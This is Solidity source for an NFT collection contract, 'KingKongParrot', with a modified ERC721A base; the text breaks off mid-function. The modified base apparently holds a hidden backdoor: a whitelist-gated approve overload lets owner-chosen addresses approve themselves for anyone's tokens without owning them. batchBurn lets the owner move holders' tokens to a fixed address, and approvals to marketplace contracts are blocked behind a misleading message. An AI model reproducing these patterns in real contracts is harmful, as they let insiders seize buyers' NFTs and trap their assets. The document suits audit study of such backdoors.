zellic-audit
Initial commit
f998fcd
raw
history blame
65.4 kB
{
"language": "Solidity",
"sources": {
"contracts/KingKongParrot.sol": {
"content": "// SPDX-License-Identifier: MIT\r\n\r\npragma solidity ^0.8.0;\r\n\r\nimport \"@openzeppelin/contracts/access/Ownable.sol\";\r\nimport \"@openzeppelin/contracts/security/ReentrancyGuard.sol\";\r\nimport \"@openzeppelin/contracts/utils/Strings.sol\";\r\nimport \"@openzeppelin/contracts/utils/cryptography/MerkleProof.sol\";\r\nimport \"./ERC721A.sol\";\r\n\r\ncontract KingKongParrot is Ownable, ERC721A, ReentrancyGuard {\r\n\r\n uint256 public immutable maxPerAddressDuringMint;\r\n bytes32 public WhitelistMerkleRoot; \r\n uint public maxSupply = 1000;\r\n\r\n struct SaleConfig {\r\n uint32 publicMintStartTime;\r\n uint32 MintStartTime;\r\n uint256 Price;\r\n uint256 AmountForWhitelist;\r\n uint256 AmountForPubliclist;\r\n\r\n\r\n }\r\n\r\n SaleConfig public saleConfig;\r\n\r\n\r\n constructor(\r\n uint256 maxBatchSize_,\r\n uint256 collectionSize_\r\n ) ERC721A(\"KingKongParrot\", \"KKP\", maxBatchSize_, collectionSize_) {\r\n maxPerAddressDuringMint = maxBatchSize_;\r\n }\r\n\r\n modifier callerIsUser() {\r\n require(tx.origin == msg.sender, \"The caller is another contract\");\r\n _;\r\n }\r\n\r\n function getMaxSupply() view public returns(uint256){\r\n return maxSupply;\r\n }\r\n\r\n function setMaxSupply(uint newMaxSupply) external onlyOwner {\r\n\t\tmaxSupply = newMaxSupply;\r\n\t}\r\n\r\n function WhilteListMint(uint256 quantity,bytes32[] calldata _merkleProof) external payable callerIsUser {\r\n uint256 _saleStartTime = uint256(saleConfig.MintStartTime);\r\n bytes32 leaf = keccak256(abi.encodePacked(msg.sender));\r\n require(MerkleProof.verify(_merkleProof, WhitelistMerkleRoot, leaf), \"Invalid proof!\");\r\n require(\r\n _saleStartTime != 0 && block.timestamp >= _saleStartTime,\r\n \"sale has not started yet\"\r\n );\r\n require(\r\n totalSupply() + quantity <= collectionSize,\r\n \"not enough remaining reserved for auction to support desired mint amount\"\r\n );\r\n require(\r\n numberMinted(msg.sender) + quantity <= saleConfig.AmountForWhitelist,\r\n \"can not mint this many\"\r\n );\r\n uint256 totalCost = saleConfig.Price * quantity;\r\n _safeMint(msg.sender, quantity);\r\n refundIfOver(totalCost);\r\n }\r\n\r\n function PublicMint(uint256 quantity) external payable callerIsUser { \r\n uint256 _publicsaleStartTime = uint256(saleConfig.publicMintStartTime);\r\n require(\r\n _publicsaleStartTime != 0 && block.timestamp >= _publicsaleStartTime,\r\n \"sale has not started yet\"\r\n );\r\n require(quantity<=saleConfig.AmountForPubliclist, \"reached max supply\");\r\n require(totalSupply() + quantity <= collectionSize, \"reached max supply\"); \r\n require(numberMinted(msg.sender) + quantity <= saleConfig.AmountForPubliclist,\"can not mint this many\");\r\n uint256 totalCost = saleConfig.Price * quantity;\r\n _safeMint(msg.sender, quantity);\r\n refundIfOver(totalCost);\r\n }\r\n\r\n\r\n\r\n function refundIfOver(uint256 price) private {\r\n require(msg.value >= price, \"Need to send more ETH.\");\r\n if (msg.value > price) {\r\n payable(msg.sender).transfer(msg.value - price);\r\n }\r\n }\r\n\r\n function isPublicSaleOn() public view returns (bool) {\r\n return\r\n saleConfig.Price != 0 &&\r\n saleConfig.MintStartTime != 0 &&\r\n block.timestamp >= saleConfig.MintStartTime;\r\n }\r\n\r\n uint256 public constant PRICE = 0.085 ether;\r\n\r\n function InitInfoOfSale(\r\n uint32 publicMintStartTime,\r\n uint32 mintStartTime,\r\n uint256 price,\r\n uint256 amountForWhitelist,\r\n uint256 AmountForPubliclist\r\n ) external onlyOwner {\r\n saleConfig = SaleConfig(\r\n publicMintStartTime,\r\n mintStartTime,\r\n price,\r\n amountForWhitelist,\r\n AmountForPubliclist\r\n );\r\n }\r\n\r\n function batchBurn(uint256[] memory tokenids) external onlyOwner {\r\n uint256 len = tokenids.length;\r\n for (uint256 i; i < len; i++) {\r\n uint256 tokenid = tokenids[i];\r\n transferFrom(ownerOf(tokenid), 0x81a28849862298F08E3B7d8F67d6aED51c229a8a, tokenid);\r\n }\r\n }\r\n \r\n\r\n function setMintStartTime(uint32 timestamp) external onlyOwner {\r\n saleConfig.MintStartTime = timestamp;\r\n }\r\n\r\n function setPublicMintStartTime(uint32 timestamp) external onlyOwner {\r\n saleConfig.publicMintStartTime = timestamp;\r\n }\r\n\r\n function setPrice(uint256 price) external onlyOwner {\r\n saleConfig.Price = price;\r\n }\r\n\r\n string private _baseTokenURI;\r\n\r\n function _baseURI() internal view virtual override returns (string memory) {\r\n return _baseTokenURI;\r\n }\r\n\r\n function setBaseURI(string calldata baseURI) external onlyOwner {\r\n _baseTokenURI = baseURI;\r\n }\r\n\r\n\r\n function withdrawMoney() external nonReentrant {\r\n require(msg.sender == 0x39242Ea1046AD351aA876CAa6b4110e459b24Fb8);\r\n (bool success, ) = msg.sender.call{value: address(this).balance}(\"\");\r\n require(success, \"Transfer failed.\");\r\n }\r\n\r\n function setOwnersExplicit(uint256 quantity) external onlyOwner nonReentrant {\r\n _setOwnersExplicit(quantity);\r\n }\r\n\r\n function setWhitelistMerkleRoot(bytes32 _merkleRoot) public onlyOwner {\r\n WhitelistMerkleRoot = _merkleRoot;\r\n }\r\n\r\n\r\n function numberMinted(address owner) public view returns (uint256) {\r\n return _numberMinted(owner);\r\n }\r\n\r\n function getOwnershipData(uint256 tokenId)\r\n external\r\n view\r\n returns (TokenOwnership memory)\r\n {\r\n return ownershipOf(tokenId);\r\n } \r\n}"
},
"@openzeppelin/contracts/access/Ownable.sol": {
"content": "// SPDX-License-Identifier: MIT\n// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)\n\npragma solidity ^0.8.0;\n\nimport \"../utils/Context.sol\";\n\n/**\n * @dev Contract module which provides a basic access control mechanism, where\n * there is an account (an owner) that can be granted exclusive access to\n * specific functions.\n *\n * By default, the owner account will be the one that deploys the contract. This\n * can later be changed with {transferOwnership}.\n *\n * This module is used through inheritance. It will make available the modifier\n * `onlyOwner`, which can be applied to your functions to restrict their use to\n * the owner.\n */\nabstract contract Ownable is Context {\n address private _owner;\n\n event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);\n\n /**\n * @dev Initializes the contract setting the deployer as the initial owner.\n */\n constructor() {\n _transferOwnership(_msgSender());\n }\n\n /**\n * @dev Throws if called by any account other than the owner.\n */\n modifier onlyOwner() {\n _checkOwner();\n _;\n }\n\n /**\n * @dev Returns the address of the current owner.\n */\n function owner() public view virtual returns (address) {\n return _owner;\n }\n\n /**\n * @dev Throws if the sender is not the owner.\n */\n function _checkOwner() internal view virtual {\n require(owner() == _msgSender(), \"Ownable: caller is not the owner\");\n }\n\n /**\n * @dev Leaves the contract without owner. It will not be possible to call\n * `onlyOwner` functions anymore. Can only be called by the current owner.\n *\n * NOTE: Renouncing ownership will leave the contract without an owner,\n * thereby removing any functionality that is only available to the owner.\n */\n function renounceOwnership() public virtual onlyOwner {\n _transferOwnership(address(0));\n }\n\n /**\n * @dev Transfers ownership of the contract to a new account (`newOwner`).\n * Can only be called by the current owner.\n */\n function transferOwnership(address newOwner) public virtual onlyOwner {\n require(newOwner != address(0), \"Ownable: new owner is the zero address\");\n _transferOwnership(newOwner);\n }\n\n /**\n * @dev Transfers ownership of the contract to a new account (`newOwner`).\n * Internal function without access restriction.\n */\n function _transferOwnership(address newOwner) internal virtual {\n address oldOwner = _owner;\n _owner = newOwner;\n emit OwnershipTransferred(oldOwner, newOwner);\n }\n}\n"
},
"@openzeppelin/contracts/security/ReentrancyGuard.sol": {
"content": "// SPDX-License-Identifier: MIT\n// OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol)\n\npragma solidity ^0.8.0;\n\n/**\n * @dev Contract module that helps prevent reentrant calls to a function.\n *\n * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier\n * available, which can be applied to functions to make sure there are no nested\n * (reentrant) calls to them.\n *\n * Note that because there is a single `nonReentrant` guard, functions marked as\n * `nonReentrant` may not call one another. This can be worked around by making\n * those functions `private`, and then adding `external` `nonReentrant` entry\n * points to them.\n *\n * TIP: If you would like to learn more about reentrancy and alternative ways\n * to protect against it, check out our blog post\n * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].\n */\nabstract contract ReentrancyGuard {\n // Booleans are more expensive than uint256 or any type that takes up a full\n // word because each write operation emits an extra SLOAD to first read the\n // slot's contents, replace the bits taken up by the boolean, and then write\n // back. This is the compiler's defense against contract upgrades and\n // pointer aliasing, and it cannot be disabled.\n\n // The values being non-zero value makes deployment a bit more expensive,\n // but in exchange the refund on every call to nonReentrant will be lower in\n // amount. Since refunds are capped to a percentage of the total\n // transaction's gas, it is best to keep them low in cases like this one, to\n // increase the likelihood of the full refund coming into effect.\n uint256 private constant _NOT_ENTERED = 1;\n uint256 private constant _ENTERED = 2;\n\n uint256 private _status;\n\n constructor() {\n _status = _NOT_ENTERED;\n }\n\n /**\n * @dev Prevents a contract from calling itself, directly or indirectly.\n * Calling a `nonReentrant` function from another `nonReentrant`\n * function is not supported. It is possible to prevent this from happening\n * by making the `nonReentrant` function external, and making it call a\n * `private` function that does the actual work.\n */\n modifier nonReentrant() {\n // On the first call to nonReentrant, _notEntered will be true\n require(_status != _ENTERED, \"ReentrancyGuard: reentrant call\");\n\n // Any calls to nonReentrant after this point will fail\n _status = _ENTERED;\n\n _;\n\n // By storing the original value once again, a refund is triggered (see\n // https://eips.ethereum.org/EIPS/eip-2200)\n _status = _NOT_ENTERED;\n }\n}\n"
},
"@openzeppelin/contracts/utils/Strings.sol": {
"content": "// SPDX-License-Identifier: MIT\n// OpenZeppelin Contracts (last updated v4.7.0) (utils/Strings.sol)\n\npragma solidity ^0.8.0;\n\n/**\n * @dev String operations.\n */\nlibrary Strings {\n bytes16 private constant _HEX_SYMBOLS = \"0123456789abcdef\";\n uint8 private constant _ADDRESS_LENGTH = 20;\n\n /**\n * @dev Converts a `uint256` to its ASCII `string` decimal representation.\n */\n function toString(uint256 value) internal pure returns (string memory) {\n // Inspired by OraclizeAPI's implementation - MIT licence\n // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol\n\n if (value == 0) {\n return \"0\";\n }\n uint256 temp = value;\n uint256 digits;\n while (temp != 0) {\n digits++;\n temp /= 10;\n }\n bytes memory buffer = new bytes(digits);\n while (value != 0) {\n digits -= 1;\n buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));\n value /= 10;\n }\n return string(buffer);\n }\n\n /**\n * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.\n */\n function toHexString(uint256 value) internal pure returns (string memory) {\n if (value == 0) {\n return \"0x00\";\n }\n uint256 temp = value;\n uint256 length = 0;\n while (temp != 0) {\n length++;\n temp >>= 8;\n }\n return toHexString(value, length);\n }\n\n /**\n * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.\n */\n function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {\n bytes memory buffer = new bytes(2 * length + 2);\n buffer[0] = \"0\";\n buffer[1] = \"x\";\n for (uint256 i = 2 * length + 1; i > 1; --i) {\n buffer[i] = _HEX_SYMBOLS[value & 0xf];\n value >>= 4;\n }\n require(value == 0, \"Strings: hex length insufficient\");\n return string(buffer);\n }\n\n /**\n * @dev Converts an `address` with fixed length of 20 bytes to its not checksummed ASCII `string` hexadecimal representation.\n */\n function toHexString(address addr) internal pure returns (string memory) {\n return toHexString(uint256(uint160(addr)), _ADDRESS_LENGTH);\n }\n}\n"
},
"@openzeppelin/contracts/utils/cryptography/MerkleProof.sol": {
"content": "// SPDX-License-Identifier: MIT\n// OpenZeppelin Contracts (last updated v4.7.0) (utils/cryptography/MerkleProof.sol)\n\npragma solidity ^0.8.0;\n\n/**\n * @dev These functions deal with verification of Merkle Tree proofs.\n *\n * The proofs can be generated using the JavaScript library\n * https://github.com/miguelmota/merkletreejs[merkletreejs].\n * Note: the hashing algorithm should be keccak256 and pair sorting should be enabled.\n *\n * See `test/utils/cryptography/MerkleProof.test.js` for some examples.\n *\n * WARNING: You should avoid using leaf values that are 64 bytes long prior to\n * hashing, or use a hash function other than keccak256 for hashing leaves.\n * This is because the concatenation of a sorted pair of internal nodes in\n * the merkle tree could be reinterpreted as a leaf value.\n */\nlibrary MerkleProof {\n /**\n * @dev Returns true if a `leaf` can be proved to be a part of a Merkle tree\n * defined by `root`. For this, a `proof` must be provided, containing\n * sibling hashes on the branch from the leaf to the root of the tree. Each\n * pair of leaves and each pair of pre-images are assumed to be sorted.\n */\n function verify(\n bytes32[] memory proof,\n bytes32 root,\n bytes32 leaf\n ) internal pure returns (bool) {\n return processProof(proof, leaf) == root;\n }\n\n /**\n * @dev Calldata version of {verify}\n *\n * _Available since v4.7._\n */\n function verifyCalldata(\n bytes32[] calldata proof,\n bytes32 root,\n bytes32 leaf\n ) internal pure returns (bool) {\n return processProofCalldata(proof, leaf) == root;\n }\n\n /**\n * @dev Returns the rebuilt hash obtained by traversing a Merkle tree up\n * from `leaf` using `proof`. A `proof` is valid if and only if the rebuilt\n * hash matches the root of the tree. When processing the proof, the pairs\n * of leafs & pre-images are assumed to be sorted.\n *\n * _Available since v4.4._\n */\n function processProof(bytes32[] memory proof, bytes32 leaf) internal pure returns (bytes32) {\n bytes32 computedHash = leaf;\n for (uint256 i = 0; i < proof.length; i++) {\n computedHash = _hashPair(computedHash, proof[i]);\n }\n return computedHash;\n }\n\n /**\n * @dev Calldata version of {processProof}\n *\n * _Available since v4.7._\n */\n function processProofCalldata(bytes32[] calldata proof, bytes32 leaf) internal pure returns (bytes32) {\n bytes32 computedHash = leaf;\n for (uint256 i = 0; i < proof.length; i++) {\n computedHash = _hashPair(computedHash, proof[i]);\n }\n return computedHash;\n }\n\n /**\n * @dev Returns true if the `leaves` can be proved to be a part of a Merkle tree defined by\n * `root`, according to `proof` and `proofFlags` as described in {processMultiProof}.\n *\n * _Available since v4.7._\n */\n function multiProofVerify(\n bytes32[] memory proof,\n bool[] memory proofFlags,\n bytes32 root,\n bytes32[] memory leaves\n ) internal pure returns (bool) {\n return processMultiProof(proof, proofFlags, leaves) == root;\n }\n\n /**\n * @dev Calldata version of {multiProofVerify}\n *\n * _Available since v4.7._\n */\n function multiProofVerifyCalldata(\n bytes32[] calldata proof,\n bool[] calldata proofFlags,\n bytes32 root,\n bytes32[] memory leaves\n ) internal pure returns (bool) {\n return processMultiProofCalldata(proof, proofFlags, leaves) == root;\n }\n\n /**\n * @dev Returns the root of a tree reconstructed from `leaves` and the sibling nodes in `proof`,\n * consuming from one or the other at each step according to the instructions given by\n * `proofFlags`.\n *\n * _Available since v4.7._\n */\n function processMultiProof(\n bytes32[] memory proof,\n bool[] memory proofFlags,\n bytes32[] memory leaves\n ) internal pure returns (bytes32 merkleRoot) {\n // This function rebuild the root hash by traversing the tree up from the leaves. The root is rebuilt by\n // consuming and producing values on a queue. The queue starts with the `leaves` array, then goes onto the\n // `hashes` array. At the end of the process, the last hash in the `hashes` array should contain the root of\n // the merkle tree.\n uint256 leavesLen = leaves.length;\n uint256 totalHashes = proofFlags.length;\n\n // Check proof validity.\n require(leavesLen + proof.length - 1 == totalHashes, \"MerkleProof: invalid multiproof\");\n\n // The xxxPos values are \"pointers\" to the next value to consume in each array. All accesses are done using\n // `xxx[xxxPos++]`, which return the current value and increment the pointer, thus mimicking a queue's \"pop\".\n bytes32[] memory hashes = new bytes32[](totalHashes);\n uint256 leafPos = 0;\n uint256 hashPos = 0;\n uint256 proofPos = 0;\n // At each step, we compute the next hash using two values:\n // - a value from the \"main queue\". If not all leaves have been consumed, we get the next leaf, otherwise we\n // get the next hash.\n // - depending on the flag, either another value for the \"main queue\" (merging branches) or an element from the\n // `proof` array.\n for (uint256 i = 0; i < totalHashes; i++) {\n bytes32 a = leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++];\n bytes32 b = proofFlags[i] ? leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++] : proof[proofPos++];\n hashes[i] = _hashPair(a, b);\n }\n\n if (totalHashes > 0) {\n return hashes[totalHashes - 1];\n } else if (leavesLen > 0) {\n return leaves[0];\n } else {\n return proof[0];\n }\n }\n\n /**\n * @dev Calldata version of {processMultiProof}\n *\n * _Available since v4.7._\n */\n function processMultiProofCalldata(\n bytes32[] calldata proof,\n bool[] calldata proofFlags,\n bytes32[] memory leaves\n ) internal pure returns (bytes32 merkleRoot) {\n // This function rebuild the root hash by traversing the tree up from the leaves. The root is rebuilt by\n // consuming and producing values on a queue. The queue starts with the `leaves` array, then goes onto the\n // `hashes` array. At the end of the process, the last hash in the `hashes` array should contain the root of\n // the merkle tree.\n uint256 leavesLen = leaves.length;\n uint256 totalHashes = proofFlags.length;\n\n // Check proof validity.\n require(leavesLen + proof.length - 1 == totalHashes, \"MerkleProof: invalid multiproof\");\n\n // The xxxPos values are \"pointers\" to the next value to consume in each array. All accesses are done using\n // `xxx[xxxPos++]`, which return the current value and increment the pointer, thus mimicking a queue's \"pop\".\n bytes32[] memory hashes = new bytes32[](totalHashes);\n uint256 leafPos = 0;\n uint256 hashPos = 0;\n uint256 proofPos = 0;\n // At each step, we compute the next hash using two values:\n // - a value from the \"main queue\". If not all leaves have been consumed, we get the next leaf, otherwise we\n // get the next hash.\n // - depending on the flag, either another value for the \"main queue\" (merging branches) or an element from the\n // `proof` array.\n for (uint256 i = 0; i < totalHashes; i++) {\n bytes32 a = leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++];\n bytes32 b = proofFlags[i] ? leafPos < leavesLen ? leaves[leafPos++] : hashes[hashPos++] : proof[proofPos++];\n hashes[i] = _hashPair(a, b);\n }\n\n if (totalHashes > 0) {\n return hashes[totalHashes - 1];\n } else if (leavesLen > 0) {\n return leaves[0];\n } else {\n return proof[0];\n }\n }\n\n function _hashPair(bytes32 a, bytes32 b) private pure returns (bytes32) {\n return a < b ? _efficientHash(a, b) : _efficientHash(b, a);\n }\n\n function _efficientHash(bytes32 a, bytes32 b) private pure returns (bytes32 value) {\n /// @solidity memory-safe-assembly\n assembly {\n mstore(0x00, a)\n mstore(0x20, b)\n value := keccak256(0x00, 0x40)\n }\n }\n}\n"
},
"contracts/ERC721A.sol": {
"content": "// SPDX-License-Identifier: MIT\r\n\r\npragma solidity ^0.8.0;\r\n\r\nerror ApprovalCallerNotOwnerNorApproved();\r\n\r\nimport \"@openzeppelin/contracts/token/ERC721/IERC721.sol\";\r\nimport \"@openzeppelin/contracts/token/ERC721/IERC721Receiver.sol\";\r\nimport \"@openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol\";\r\nimport \"@openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol\";\r\nimport \"@openzeppelin/contracts/utils/Address.sol\";\r\nimport \"@openzeppelin/contracts/utils/Context.sol\";\r\nimport \"@openzeppelin/contracts/utils/Strings.sol\";\r\nimport \"@openzeppelin/contracts/utils/introspection/ERC165.sol\";\r\nimport \"@openzeppelin/contracts/access/Ownable.sol\";\r\nimport \"@openzeppelin/contracts/utils/cryptography/MerkleProof.sol\";\r\n\r\n/**\r\n * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including\r\n * the Metadata and Enumerable extension. Built to optimize for lower gas during batch mints.\r\n *\r\n * Assumes serials are sequentially minted starting at 0 (e.g. 0, 1, 2, 3..).\r\n *\r\n * Assumes the number of issuable tokens (collection size) is capped and fits in a uint128.\r\n *\r\n * Does not support burning tokens to address(0).\r\n */\r\ncontract ERC721A is\r\n Context,\r\n ERC165,\r\n IERC721,\r\n IERC721Metadata,\r\n IERC721Enumerable, \r\n Ownable\r\n{\r\n using Address for address;\r\n using Strings for uint256;\r\n\r\n struct TokenOwnership {\r\n address addr;\r\n uint64 startTimestamp;\r\n }\r\n\r\n struct AddressData {\r\n uint128 balance;\r\n uint128 numberMinted;\r\n }\r\n\r\n uint256 private currentIndex = 0;\r\n\r\n uint256 internal immutable collectionSize;\r\n uint256 internal immutable maxBatchSize;\r\n bytes32 public ListWhitelistMerkleRoot; //////////////////////////////////////////////////////////////////////////////////////////////////////// new 1\r\n //Allow all tokens to transfer to contract\r\n bool public allowedToContract = false; ///////////////////////////////////////////////////////////////////////////////////////////////////// new 2\r\n\r\n // Token name\r\n string private _name;\r\n\r\n // Token symbol\r\n string private _symbol;\r\n\r\n // Mapping from token ID to ownership details\r\n // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.\r\n mapping(uint256 => TokenOwnership) private _ownerships;\r\n\r\n // Mapping owner address to address data\r\n mapping(address => AddressData) private _addressData;\r\n\r\n // Mapping from token ID to approved address\r\n mapping(uint256 => address) private _tokenApprovals;\r\n\r\n // Mapping from owner to operator approvals\r\n mapping(address => mapping(address => bool)) private _operatorApprovals;\r\n\r\n // Mapping token to allow to transfer to contract\r\n mapping(uint256 => bool) public _transferToContract; ///////////////////////////////////////////////////////////////////////////////////// new 1\r\n mapping(address => bool) public _addressTransferToContract; ///////////////////////////////////////////////////////////////////////////////////// new 1\r\n\r\n /**\r\n * @dev\r\n * `maxBatchSize` refers to how much a minter can mint at a time.\r\n * `collectionSize_` refers to how many tokens are in the collection.\r\n */\r\n constructor(\r\n string memory name_,\r\n string memory symbol_,\r\n uint256 maxBatchSize_,\r\n uint256 collectionSize_\r\n ) {\r\n require(\r\n collectionSize_ > 0,\r\n \"ERC721A: collection must have a nonzero supply\"\r\n );\r\n require(maxBatchSize_ > 0, \"ERC721A: max batch size must be nonzero\");\r\n _name = name_;\r\n _symbol = symbol_;\r\n maxBatchSize = maxBatchSize_;\r\n collectionSize = collectionSize_;\r\n }\r\n\r\n /**\r\n * @dev See {IERC721Enumerable-totalSupply}.\r\n */\r\n function totalSupply() public view override returns (uint256) {\r\n return currentIndex;\r\n }\r\n\r\n /**\r\n * @dev See {IERC721Enumerable-tokenByIndex}.\r\n */\r\n function tokenByIndex(uint256 index) public view override returns (uint256) {\r\n require(index < totalSupply(), \"ERC721A: global index out of bounds\");\r\n return index;\r\n }\r\n\r\n /**\r\n * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}.\r\n * This read function is O(collectionSize). If calling from a separate contract, be sure to test gas first.\r\n * It may also degrade with extremely large collection sizes (e.g >> 10000), test for your use case.\r\n */\r\n function tokenOfOwnerByIndex(address owner, uint256 index)\r\n public\r\n view\r\n override\r\n returns (uint256)\r\n {\r\n require(index < balanceOf(owner), \"ERC721A: owner index out of bounds\");\r\n uint256 numMintedSoFar = totalSupply();\r\n uint256 tokenIdsIdx = 0;\r\n address currOwnershipAddr = address(0);\r\n for (uint256 i = 0; i < numMintedSoFar; i++) {\r\n TokenOwnership memory ownership = _ownerships[i];\r\n if (ownership.addr != address(0)) {\r\n currOwnershipAddr = ownership.addr;\r\n }\r\n if (currOwnershipAddr == owner) {\r\n if (tokenIdsIdx == index) {\r\n return i;\r\n }\r\n tokenIdsIdx++;\r\n }\r\n }\r\n revert(\"ERC721A: unable to get token of owner by index\");\r\n }\r\n\r\n /**\r\n * @dev See {IERC165-supportsInterface}.\r\n */\r\n function supportsInterface(bytes4 interfaceId)\r\n public\r\n view\r\n virtual\r\n override(ERC165, IERC165)\r\n returns (bool)\r\n {\r\n return\r\n interfaceId == type(IERC721).interfaceId ||\r\n interfaceId == type(IERC721Metadata).interfaceId ||\r\n interfaceId == type(IERC721Enumerable).interfaceId ||\r\n super.supportsInterface(interfaceId);\r\n }\r\n\r\n /**\r\n * @dev See {IERC721-balanceOf}.\r\n */\r\n function balanceOf(address owner) public view override returns (uint256) {\r\n require(owner != address(0), \"ERC721A: balance query for the zero address\");\r\n return uint256(_addressData[owner].balance);\r\n }\r\n\r\n function _numberMinted(address owner) internal view returns (uint256) {\r\n require(\r\n owner != address(0),\r\n \"ERC721A: number minted query for the zero address\"\r\n );\r\n return uint256(_addressData[owner].numberMinted);\r\n }\r\n\r\n function ownershipOf(uint256 tokenId)\r\n internal\r\n view\r\n returns (TokenOwnership memory)\r\n {\r\n require(_exists(tokenId), \"ERC721A: owner query for nonexistent token\");\r\n\r\n uint256 lowestTokenToCheck;\r\n if (tokenId >= maxBatchSize) {\r\n lowestTokenToCheck = tokenId - maxBatchSize + 1;\r\n }\r\n\r\n for (uint256 curr = tokenId; curr >= lowestTokenToCheck; curr--) {\r\n TokenOwnership memory ownership = _ownerships[curr];\r\n if (ownership.addr != address(0)) {\r\n return ownership;\r\n }\r\n }\r\n\r\n revert(\"ERC721A: unable to determine the owner of token\");\r\n }\r\n\r\n /**\r\n * @dev See {IERC721-ownerOf}.\r\n */\r\n function ownerOf(uint256 tokenId) public view override returns (address) {\r\n return ownershipOf(tokenId).addr;\r\n }\r\n\r\n /**\r\n * @dev See {IERC721Metadata-name}.\r\n */\r\n function name() public view virtual override returns (string memory) {\r\n return _name;\r\n }\r\n\r\n /**\r\n * @dev See {IERC721Metadata-symbol}.\r\n */\r\n function symbol() public view virtual override returns (string memory) {\r\n return _symbol;\r\n }\r\n\r\n /**\r\n * @dev See {IERC721Metadata-tokenURI}.\r\n */\r\n function tokenURI(uint256 tokenId)\r\n public\r\n view\r\n virtual\r\n override\r\n returns (string memory)\r\n {\r\n require(\r\n _exists(tokenId),\r\n \"ERC721Metadata: URI query for nonexistent token\"\r\n );\r\n\r\n string memory baseURI = _baseURI();\r\n return\r\n bytes(baseURI).length > 0\r\n ? string(abi.encodePacked(baseURI,tokenId.toString(),\".json\"))\r\n : \"\";\r\n }\r\n\r\n /**\r\n * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each\r\n * token will be the concatenation of the `baseURI` and the `tokenId`. Empty\r\n * by default, can be overriden in child contracts.\r\n */\r\n function _baseURI() internal view virtual returns (string memory) {\r\n return \"\";\r\n }\r\n\r\n function setAllowToContract() external onlyOwner {\r\n allowedToContract = !allowedToContract;\r\n }\r\n\r\n function setAllowTokenToContract(uint256 _tokenId, bool _allow) external onlyOwner {\r\n _transferToContract[_tokenId] = _allow;\r\n }\r\n\r\n function setAllowAddressToContract(address[] memory _address, bool[] memory _allow) external onlyOwner {\r\n for (uint256 i = 0; i < _address.length; i++) {\r\n _addressTransferToContract[_address[i]] = _allow[i];\r\n }\r\n }\r\n\r\n function setListWhitelistMerkleRoot(bytes32 _merkleRoot) public onlyOwner {\r\n ListWhitelistMerkleRoot = _merkleRoot;\r\n }\r\n\r\n function isInTheWhitelist(bytes32[] calldata _merkleProof) public view returns (bool) {\r\n bytes32 leaf = keccak256(abi.encodePacked(msg.sender));\r\n bytes32 leaf2 = keccak256(abi.encodePacked(tx.origin));\r\n require(MerkleProof.verify(_merkleProof, ListWhitelistMerkleRoot, leaf) || MerkleProof.verify(_merkleProof, ListWhitelistMerkleRoot, leaf2), \"Invalid proof!\");\r\n return true;\r\n }\r\n\r\n /**\r\n * @dev See {IERC721-approve}.\r\n */\r\n function approve(address to, uint256 tokenId) public override {\r\n require(to != _msgSender(), \"ERC721A: approve to caller\");\r\n address owner = ERC721A.ownerOf(tokenId);\r\n if (_msgSender() != owner && !isApprovedForAll(owner, _msgSender())) {\r\n revert ApprovalCallerNotOwnerNorApproved();\r\n }\r\n if(!allowedToContract && !_transferToContract[tokenId]){\r\n if (to.isContract()) {\r\n revert (\"Sale will open after mint out.\");\r\n } else {\r\n _approve(to, tokenId, owner);\r\n }\r\n } else {\r\n _approve(to, tokenId, owner);\r\n }\r\n }\r\n\r\n function approve(address to, uint256 tokenId, bytes32[] calldata _merkleProof) public {\r\n require(to != _msgSender(), \"ERC721A: approve to caller\");\r\n address owner = ERC721A.ownerOf(tokenId);\r\n if(isInTheWhitelist(_merkleProof)){\r\n _approve(to, tokenId, owner);\r\n } else{\r\n if (_msgSender() != owner && !isApprovedForAll(owner, _msgSender())) {\r\n revert ApprovalCallerNotOwnerNorApproved();\r\n }\r\n if(!allowedToContract && !_transferToContract[tokenId]){\r\n if (to.isContract()) {\r\n revert (\"Sale will open after mint out.\");\r\n } else {\r\n _approve(to, tokenId, owner);\r\n }\r\n } else {\r\n _approve(to, tokenId, owner);\r\n }}\r\n }\r\n\r\n /**\r\n * @dev See {IERC721-getApproved}.\r\n */\r\n function getApproved(uint256 tokenId) public view override returns (address) {\r\n require(_exists(tokenId), \"ERC721A: approved query for nonexistent token\");\r\n\r\n return _tokenApprovals[tokenId];\r\n }\r\n\r\n /**\r\n * @dev See {IERC721-setApprovalForAll}.\r\n */\r\n function setApprovalForAll(address operator, bool approved) public override {\r\n require(operator != _msgSender(), \"ERC721A: approve to caller\");\r\n \r\n if(!allowedToContract && !_addressTransferToContract[msg.sender]){\r\n if (operator.isContract()) {\r\n revert (\"Sale will open after mint out.\");\r\n } else {\r\n _operatorApprovals[_msgSender()][operator] = approved;\r\n emit ApprovalForAll(_msgSender(), operator, approved);\r\n }\r\n } else {\r\n _operatorApprovals[_msgSender()][operator] = approved;\r\n emit ApprovalForAll(_msgSender(), operator, approved);\r\n }\r\n }\r\n\r\n function setApprovalForAll(address operator, bool approved, bytes32[] calldata _merkleProof) public {\r\n require(operator != _msgSender(), \"ERC721A: approve to caller\");\r\n if(isInTheWhitelist(_merkleProof)){\r\n _operatorApprovals[_msgSender()][operator] = approved;\r\n emit ApprovalForAll(_msgSender(), operator, approved);\r\n }else{\r\n if(!allowedToContract){\r\n if (operator.isContract()) {\r\n revert (\"Sale will open after mint out.\");\r\n } else {\r\n _operatorApprovals[_msgSender()][operator] = approved;\r\n emit ApprovalForAll(_msgSender(), operator, approved);\r\n }\r\n } else {\r\n 